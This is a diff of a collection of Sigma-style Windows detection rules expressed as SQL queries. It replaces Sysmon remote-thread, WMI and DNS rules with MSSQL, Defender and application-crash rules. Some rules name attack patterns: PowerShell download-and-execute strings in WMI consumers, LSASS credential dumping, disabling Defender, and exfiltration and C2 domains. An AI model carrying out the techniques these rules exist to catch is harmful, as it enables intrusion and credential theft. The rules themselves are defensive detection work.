- "attack.t1055" + "attack.t1211", + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "MsMpEng might crash if the \"C:\\\" partition is full" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '8' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (SourceImage LIKE '%\\\\bash.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\cvtres.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\cscript.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\defrag.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\dnx.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\esentutl.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\excel.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\expand.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\explorer.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\find.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\findstr.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\gpupdate.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\hh.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\iexplore.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\installutil.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\lync.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\makecab.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\mDNSResponder.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\monitoringhost.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\msbuild.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\mshta.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\mspaint.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\outlook.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\ping.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\provtool.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\python.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\robocopy.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\runonce.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\sapcimc.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\smartscreen.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\spoolsv.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\tstheme.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\userinit.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\vssadmin.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\vssvc.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\winlogon.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\winscp.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\wmic.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\winword.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\wscript.exe' ESCAPE '\\') AND NOT ((SourceImage LIKE '%Visual Studio%' ESCAPE '\\' OR SourceParentImage LIKE '%\\\\Programs\\\\Microsoft VS Code\\\\%' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\winlogon.exe' ESCAPE '\\' AND (TargetImage LIKE 'C:\\\\Windows\\\\System32\\\\services.exe' ESCAPE '\\' OR TargetImage LIKE 'C:\\\\Windows\\\\System32\\\\wininit.exe' ESCAPE '\\' OR TargetImage LIKE 'C:\\\\Windows\\\\System32\\\\csrss.exe' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\winlogon.exe' ESCAPE '\\' AND TargetParentImage = 'System' AND TargetParentProcessId = '4') OR (SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\provtool.exe' ESCAPE '\\' AND TargetParentProcessId = '0') OR (SourceImage LIKE '%\\\\git.exe' ESCAPE '\\' AND (TargetImage LIKE '%\\\\git.exe' ESCAPE '\\' OR TargetImage LIKE '%C:\\\\Windows\\\\System32\\\\conhost.exe' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\VSSVC.exe' ESCAPE '\\' AND TargetImage = 'System') OR (SourceParentImage LIKE 'C:\\\\Windows\\\\System32\\\\CompatTelRunner.exe' ESCAPE '\\') OR ((SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\schtasks.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\SysWOW64\\\\schtasks.exe' ESCAPE '\\') AND TargetImage LIKE 'C:\\\\Windows\\\\System32\\\\conhost.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' AND TargetImage LIKE 'C:\\\\Program Files\\\\NVIDIA Corporation\\\\NVIDIA GeForce Experience\\\\NVIDIA GeForce Experience.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'Application Error' AND EventID = '1000' AND Data LIKE '%MsMpEng.exe%' ESCAPE '\\' AND Data LIKE '%mpengine.dll%' ESCAPE '\\')" ], - "filename": "create_remote_thread_win_susp_remote_thread_source.yml" + "filename": "win_application_msmpeng_crash_error.yml" }, { - "title": "Accessing WinAPI in PowerShell. Code Injection", - "id": "eeb2e3dc-c1f4-40dd-9bd5-149ee465ad50", - "status": "test", - "description": "Detects the creation of a remote thread from a Powershell process to another process", - "author": "Nikita Nazarov, oscd.community", + "title": "Potential Credential Dumping Via WER - Application", + "id": "a18e0862-127b-43ca-be12-1a542c75c7c5", + "status": "experimental", + "description": "Detects windows error reporting event where the process that crashed is lsass. This could be the cause of an intentional crash by techniques such as Lsass-Shtinkering to dump credential", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "Unknown" + "Rare legitimate crashing of the lsass process" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '8' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (SourceImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND NOT ((SourceParentImage LIKE 'C:\\\\Windows\\\\System32\\\\CompatTelRunner.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'Application Error' AND EventID = '1000' AND AppName = 'lsass.exe' AND ExceptionCode = 'c0000001')" ], - "filename": "create_remote_thread_win_powershell_code_injection.yml" + "filename": "win_werfault_susp_lsass_credential_dump.yml" }, { - "title": "CACTUSTORCH Remote Thread Creation", - "id": "2e4e488a-6164-4811-9ea1-f960c7359c40", - "status": "test", - "description": "Detects remote thread creation from CACTUSTORCH as described in references.", - "author": "@SBousseaden (detection), Thomas Patzke (rule)", + "title": "Restricted Software Access By SRP", + "id": "b4c8da4a-1c12-46b0-8a2b-0a8521d03442", + "status": "experimental", + "description": "Detects restricted access to applications by the Software Restriction Policies (SRP) policy", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1055.012", - "attack.execution", - "attack.t1059.005", - "attack.t1059.007", - "attack.t1218.005" + "attack.t1072" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '8' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (SourceImage LIKE '%\\\\System32\\\\cscript.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\System32\\\\wscript.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\System32\\\\mshta.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\winword.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\excel.exe' ESCAPE '\\') AND TargetImage LIKE '%\\\\SysWOW64\\\\%' ESCAPE '\\' AND StartModule = '')" + "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'Microsoft-Windows-SoftwareRestrictionPolicies' AND EventID IN ('865', '866', '867', '868', '882'))" ], - "filename": "create_remote_thread_win_cactustorch.yml" + "filename": "win_software_restriction_policies_block.yml" }, { - "title": "PowerShell Rundll32 Remote Thread Creation", - "id": "99b97608-3e21-4bfe-8217-2a127c396a0e", - "status": "experimental", - "description": "Detects PowerShell remote thread creation in Rundll32.exe", - "author": "Florian Roth (Nextron Systems)", + "title": "Backup Catalog Deleted", + "id": "9703792d-fd9a-456d-a672-ff92efe4806a", + "status": "test", + "description": "Detects backup catalog deletions", + "author": "Florian Roth (Nextron Systems), Tom U. @c_APT_ure (collection)", "tags": [ "attack.defense_evasion", - "attack.execution", - "attack.t1218.011", - "attack.t1059.001" + "attack.t1070.004" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '8' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (SourceImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND TargetImage LIKE '%\\\\rundll32.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Application' AND EventID = '524' AND Provider_Name = 'Microsoft-Windows-Backup')" ], - "filename": "create_remote_thread_win_susp_powershell_rundll32.yml" + "filename": "win_susp_backup_delete.yml" }, { - "title": "WMI Event Subscription", - "id": "0f06a3a5-6a09-413f-8743-e6cf35561297", - "status": "test", - "description": "Detects creation of WMI event subscription persistence method", - "author": "Tom Ueltschi (@c_APT_ure)", + "title": "MSSQL XPCmdshell Option Change", + "id": "d08dd86f-681e-4a00-a92c-1db218754417", + "status": "experimental", + "description": "Detects when the MSSQL \"xp_cmdshell\" stored procedure setting is changed", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1546.003" + "attack.execution" ], "falsepositives": [ - "Exclude legitimate (vetted) use of WMI event subscription in your network" + "Legitimate enable/disable of the setting", + "Note that since the event contain the change for both values. This means that this will trigger on both enable and disable" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('19', '20', '21') AND Channel = 'Microsoft-Windows-Sysmon/Operational')" + "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MSSQLSERVER' AND EventID = '15457' AND Data LIKE '%xp\\_cmdshell%' ESCAPE '\\')" ], - "filename": "sysmon_wmi_event_subscription.yml" + "filename": "win_mssql_xp_cmdshell_change.yml" }, { - "title": "Suspicious Scripting in a WMI Consumer", - "id": "fe21810c-2a8c-478f-8dd3-5a287fb2a0e0", + "title": "MSSQL Add Account To Sysadmin Role", + "id": "08200f85-2678-463e-9c32-88dce2f073d1", "status": "experimental", - "description": "Detects suspicious commands that are related to scripting/powershell in WMI Event Consumers", - "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro", + "description": "Detects when an attacker tries to backdoor the MSSQL server by adding a backdoor account to the sysadmin fixed server role", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.005" + "attack.persistence" ], "falsepositives": [ - "Legitimate administrative scripts" + "Rare legitimate administrative activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID IN ('19', '20', '21') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Destination LIKE '%new-object%' ESCAPE '\\' AND Destination LIKE '%net.webclient%' ESCAPE '\\' AND Destination LIKE '%.downloadstring%' ESCAPE '\\') OR (Destination LIKE '%new-object%' ESCAPE '\\' AND Destination LIKE '%net.webclient%' ESCAPE '\\' AND Destination LIKE '%.downloadfile%' ESCAPE '\\') OR (Destination LIKE '% iex(%' ESCAPE '\\' OR Destination LIKE '%WScript.shell%' ESCAPE '\\' OR Destination LIKE '% -nop %' ESCAPE '\\' OR Destination LIKE '% -noprofile %' ESCAPE '\\' OR Destination LIKE '% -decode %' ESCAPE '\\' OR Destination LIKE '% -enc %' ESCAPE '\\') OR (Destination LIKE '%WScript.Shell%' ESCAPE '\\' OR Destination LIKE '%System.Security.Cryptography.FromBase64Transform%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MSSQLSERVER' AND EventID = '33205' AND Data LIKE '%object\\_name:sysadmin%' ESCAPE '\\' AND Data LIKE '%statement:alter server role [sysadmin] add member %' ESCAPE '\\')" ], - "filename": "sysmon_wmi_susp_scripting.yml" + "filename": "win_mssql_add_sysadmin_account.yml" }, { - "title": "DNS Query for Anonfiles.com Domain - Sysmon", - "id": "065cceea-77ec-4030-9052-fc0affea7110", + "title": "MSSQL Extended Stored Procedure Backdoor Maggie", + "id": "711ab2fe-c9ba-4746-8840-5228a58c3cb8", "status": "experimental", - "description": "Detects DNS queries for \"anonfiles.com\", which is an anonymous file upload platform often used for malicious purposes", - "author": "pH-T (Nextron Systems)", + "description": "This rule detects the execution of the extended storage procedure backdoor named Maggie in the context of Microsoft SQL server", + "author": "Denis Szadkowski, DIRT / DCSO CyTec", "tags": [ - "attack.exfiltration", - "attack.t1567.002" + "attack.persistence", + "attack.t1546" ], "falsepositives": [ - "Rare legitimate access to anonfiles.com" + "Legitimate extended stored procedures named maggie" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '22' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND QueryName LIKE '%.anonfiles.com%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MSSQLSERVER' AND EventID = '8128' AND Message LIKE '%maggie%' ESCAPE '\\')" ], - "filename": "dns_query_win_anonymfiles_com.yml" + "filename": "win_mssql_sp_maggie.yml" }, { - "title": "DNS HybridConnectionManager Service Bus", - "id": "7bd3902d-8b8b-4dd4-838a-c6862d40150d", - "status": "test", - "description": "Detects Azure Hybrid Connection Manager services querying the Azure service bus service", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "title": "MSSQL SPProcoption Set", + "id": "b3d57a5c-c92e-4b48-9a79-5f124b7cf964", + "status": "experimental", + "description": "Detects when the a stored procedure is set or cleared for automatic execution in MSSQL. A stored procedure that is set to automatic execution runs every time an instance of SQL Server is started", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1554" + "attack.persistence" ], "falsepositives": [ - "Legitimate use of Azure Hybrid Connection Manager and the Azure Service Bus service" + "Legitimate use of the feature by administrators (rare)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '22' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND QueryName LIKE '%servicebus.windows.net%' ESCAPE '\\' AND Image LIKE '%HybridConnectionManager%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MSSQLSERVER' AND EventID = '33205' AND Data LIKE '%object\\_name:sp\\_procoption%' ESCAPE '\\' AND Data LIKE '%statement:EXEC%' ESCAPE '\\')" ], - "filename": "dns_query_win_hybridconnectionmgr_servicebus.yml" + "filename": "win_mssql_sp_procoption_set.yml" }, { - "title": "Suspicious Cobalt Strike DNS Beaconing - Sysmon", - "id": "f356a9c4-effd-4608-bbf8-408afd5cd006", - "status": "test", - "description": "Detects a program that invoked suspicious DNS queries known from Cobalt Strike beacons", - "author": "Florian Roth (Nextron Systems)", + "title": "MSSQL XPCmdshell Suspicious Execution", + "id": "7f103213-a04e-4d59-8261-213dddf22314", + "status": "experimental", + "description": "Detects when the MSSQL \"xp_cmdshell\" stored procedure is used to execute commands", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1071.004" + "attack.execution" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '22' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((QueryName LIKE 'aaa.stage.%' ESCAPE '\\' OR QueryName LIKE 'post.1%' ESCAPE '\\') OR QueryName LIKE '%.stage.123456.%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MSSQLSERVER' AND EventID = '33205' AND Data LIKE '%object\\_name:xp\\_cmdshell%' ESCAPE '\\' AND Data LIKE '%statement:EXEC%' ESCAPE '\\')" ], - "filename": "dns_query_win_mal_cobaltstrike.yml" + "filename": "win_mssql_xp_cmdshell_audit_log.yml" }, { - "title": "DNS Query for Ufile.io Upload Domain - Sysmon", - "id": "1cbbeaaf-3c8c-4e4c-9d72-49485b6a176b", + "title": "MSSQL Disable Audit Settings", + "id": "350dfb37-3706-4cdc-9e2e-5e24bc3a46df", "status": "experimental", - "description": "Detects DNS queries to \"ufile.io\". Which is often abused by malware for upload and exfiltration", - "author": "yatinwad and TheDFIRReport", + "description": "Detects when an attacker calls the \"ALTER SERVER AUDIT\" or \"DROP SERVER AUDIT\" transaction in order to delete or disable audit logs on the server", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.exfiltration", - "attack.t1567.002" + "attack.defense_evasion" ], "falsepositives": [ - "Legitimate DNS queries and usage of Ufile" + "This event should only fire when an administrator is modifying the audit policy. Which should be a rare occurrence once it's set up" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '22' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND QueryName LIKE '%ufile.io%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MSSQLSERVER' AND EventID = '33205' AND (Data LIKE '%statement:ALTER SERVER AUDIT%' ESCAPE '\\' OR Data LIKE '%statement:DROP SERVER AUDIT%' ESCAPE '\\'))" ], - "filename": "dns_query_win_ufile_io.yml" + "filename": "win_mssql_disable_audit_settings.yml" }, { - "title": "Regsvr32 Network Activity - DNS", - "id": "36e037c4-c228-4866-b6a3-48eb292b9955", - "status": "test", - "description": "Detects network connections and DNS queries initiated by Regsvr32.exe", - "author": "Dmitriy Lifanov, oscd.community", + "title": "MSMQ Corrupted Packet Encountered", + "id": "ae94b10d-fee9-4767-82bb-439b309d5a27", + "status": "experimental", + "description": "Detects corrupted packets sent to the MSMQ service. Could potentially be a sign of CVE-2023-21554 exploitation", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1559.001", - "attack.defense_evasion", - "attack.t1218.010" + "attack.execution" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '22' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MSMQ' AND EventID = '2027' AND Level = '2')" ], - "filename": "dns_query_win_regsvr32_network_activity.yml" + "filename": "win_msmq_corrupted_packet.yml" }, { - "title": "Potential Compromised 3CXDesktopApp Beaconing Activity - DNS", - "id": "bd03a0dc-5d93-49eb-b2e8-2dfd268600f8", - "status": "experimental", - "description": "Detects potential beaconing activity to domains related to 3CX 3CXDesktopApp compromise", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Windows Defender Threat Detection Disabled", + "id": "fe34868f-6e0e-4882-81f6-c43aa8f15b62", + "status": "stable", + "description": "Detects disabling Windows Defender threat protection", + "author": "Ján Trenčanský, frack113", "tags": [ - "attack.command_and_control" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Unlikely" + "Administrator actions (should be investigated)", + "Seen being triggered occasionally during Windows 8 Defender Updates" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '22' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (QueryName LIKE '%akamaicontainer.com%' ESCAPE '\\' OR QueryName LIKE '%akamaitechcloudservices.com%' ESCAPE '\\' OR QueryName LIKE '%azuredeploystore.com%' ESCAPE '\\' OR QueryName LIKE '%azureonlinecloud.com%' ESCAPE '\\' OR QueryName LIKE '%azureonlinestorage.com%' ESCAPE '\\' OR QueryName LIKE '%dunamistrd.com%' ESCAPE '\\' OR QueryName LIKE '%glcloudservice.com%' ESCAPE '\\' OR QueryName LIKE '%journalide.org%' ESCAPE '\\' OR QueryName LIKE '%msedgepackageinfo.com%' ESCAPE '\\' OR QueryName LIKE '%msedgeupdate.net%' ESCAPE '\\' OR QueryName LIKE '%msstorageazure.com%' ESCAPE '\\' OR QueryName LIKE '%msstorageboxes.com%' ESCAPE '\\' OR QueryName LIKE '%officeaddons.com%' ESCAPE '\\' OR QueryName LIKE '%officestoragebox.com%' ESCAPE '\\' OR QueryName LIKE '%pbxcloudeservices.com%' ESCAPE '\\' OR QueryName LIKE '%pbxphonenetwork.com%' ESCAPE '\\' OR QueryName LIKE '%pbxsources.com%' ESCAPE '\\' OR QueryName LIKE '%qwepoi123098.com%' ESCAPE '\\' OR QueryName LIKE '%sbmsa.wiki%' ESCAPE '\\' OR QueryName LIKE '%sourceslabs.com%' ESCAPE '\\' OR QueryName LIKE '%visualstudiofactory.com%' ESCAPE '\\' OR QueryName LIKE '%zacharryblogs.com%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID IN ('5001', '5010', '5012', '5101'))" ], - "filename": "dns_query_win_malware_3cx_compromise.yml" + "filename": "win_defender_disabled.yml" }, { - "title": "DNS Query for MEGA.io Upload Domain - Sysmon", - "id": "613c03ba-0779-4a53-8a1f-47f914a4ded3", + "title": "PSExec and WMI Process Creations Block", + "id": "97b9ce1e-c5ab-11ea-87d0-0242ac130003", "status": "test", - "description": "Detects DNS queries for subdomains used for upload to MEGA.io", - "author": "Aaron Greetham (@beardofbinary) - NCC Group", + "description": "Detects blocking of process creations originating from PSExec and WMI commands", + "author": "Bhabesh Raj", "tags": [ - "attack.exfiltration", - "attack.t1567.002" + "attack.execution", + "attack.lateral_movement", + "attack.t1047", + "attack.t1569.002" ], "falsepositives": [ - "Legitimate DNS queries and usage of Mega" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '22' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND QueryName LIKE '%userstorage.mega.co.nz%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID = '1121' AND (ProcessName LIKE '%\\\\wmiprvse.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\psexesvc.exe' ESCAPE '\\'))" ], - "filename": "dns_query_win_mega_nz.yml" + "filename": "win_defender_psexec_wmi_asr.yml" }, { - "title": "Suspicious LDAP Domain Access", - "id": "a21bcd7e-38ec-49ad-b69a-9ea17e69509e", + "title": "LSASS Access Detected via Attack Surface Reduction", + "id": "a0a278fe-2c0e-4de2-ac3c-c68b08a9ba98", "status": "experimental", - "description": "Detect suspicious LDAP request from non-Windows application", - "author": "frack113", + "description": "Detects Access to LSASS Process", + "author": "Markus Neis", "tags": [ - "attack.discovery", - "attack.t1482" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "Programs that also lookup the observed domain" + "Google Chrome GoogleUpdate.exe", + "Some Taskmgr.exe related activity" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '22' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND QueryName LIKE '\\_ldap.%' ESCAPE '\\' AND NOT ((Image LIKE 'C:\\\\Windows\\\\%' ESCAPE '\\') OR ((Image LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\MsMpEng.exe%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\Windows Defender\\\\MsMpEng.exe%' ESCAPE '\\') AND Image LIKE '%\\\\MsMpEng.exe' ESCAPE '\\') OR (Image = '') OR (Image LIKE 'C:\\\\WindowsAzure\\\\GuestAgent%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND (EventID = '1121' AND Path LIKE '%\\\\lsass.exe' ESCAPE '\\') AND NOT ((ProcessName LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\' AND (ProcessName LIKE '%\\\\thor64.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\thor.exe' ESCAPE '\\')) OR ((ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\atiesrxx.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\CompatTelRunner.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\nvwmi64.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\Taskmgr.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\msiexec.exe' ESCAPE '\\')) OR ((ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\DriverStore\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\WINDOWS\\\\Installer\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\'))))" ], - "filename": "dns_query_win_susp_ldap.yml" + "filename": "win_defender_alert_lsass_access.yml" }, { - "title": "DNS Query Tor Onion Address - Sysmon", - "id": "b55ca2a3-7cff-4dda-8bdd-c7bfa63bf544", + "title": "Win Defender Restored Quarantine File", + "id": "bc92ca75-cd42-4d61-9a37-9d5aa259c88b", "status": "experimental", - "description": "Detects DNS queries to an \".onion\" address related to Tor routing networks", - "author": "frack113", + "description": "Detects the restoration of files from the defender quarantine", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1090.003" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Legitimate administrator activity restoring a file" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '22' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND QueryName LIKE '%.onion%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID = '1009')" ], - "filename": "dns_query_win_tor_onion.yml" + "filename": "win_defender_restored_quarantine_file.yml" }, { - "title": "Suspicious DNS Query for IP Lookup Service APIs", - "id": "ec82e2a5-81ea-4211-a1f8-37a0286df2c2", - "status": "test", - "description": "Detects DNS queries for ip lookup services such as api.ipify.org not originating from a non browser process.", - "author": "Brandon George (blog post), Thomas Patzke (rule)", + "title": "Windows Defender Threat Detected", + "id": "57b649ef-ff42-4fb0-8bf6-62da243a1708", + "status": "stable", + "description": "Detects all actions taken by Windows Defender malware detection engines", + "author": "Ján Trenčanský", "tags": [ - "attack.reconnaissance", - "attack.t1590" + "attack.execution", + "attack.t1059" ], "falsepositives": [ - "Legitimate usage of ip lookup services such as ipify API" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '22' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND QueryName IN ('canireachthe.net', 'ipv4.icanhazip.com', 'ip.anysrc.net', 'edns.ip-api.com', 'wtfismyip.com', 'checkip.dyndns.org', 'api.2ip.ua', 'icanhazip.com', 'api.ipify.org', 'ip-api.com', 'checkip.amazonaws.com', 'ipecho.net', 'ipinfo.io', 'ipv4bot.whatismyipaddress.com', 'freegeoip.app', 'ifconfig.me', 'ipwho.is') AND NOT ((Image LIKE '%\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' OR Image LIKE '%\\\\iexplore.exe' ESCAPE '\\' OR Image LIKE '%\\\\firefox.exe' ESCAPE '\\' OR Image LIKE '%\\\\brave.exe' ESCAPE '\\' OR Image LIKE '%\\\\opera.exe' ESCAPE '\\' OR Image LIKE '%\\\\msedge.exe' ESCAPE '\\' OR Image LIKE '%\\\\vivaldi.exe' ESCAPE '\\' OR Image LIKE '%\\\\chromium.exe' ESCAPE '\\' OR Image LIKE '%\\\\microsoftedge.exe' ESCAPE '\\' OR Image LIKE '%\\\\iexplorer.exe' ESCAPE '\\' OR Image LIKE '%\\\\CCleaner Browser\\\\Application\\\\CCleanerBrowser.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID IN ('1006', '1116', '1015', '1117'))" ], - "filename": "dns_query_win_susp_ipify.yml" + "filename": "win_defender_threat.yml" }, { - "title": "DNS Query To Remote Access Software Domain", - "id": "4d07b1f4-cb00-4470-b9f8-b0191d48ff52", - "status": "experimental", - "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate 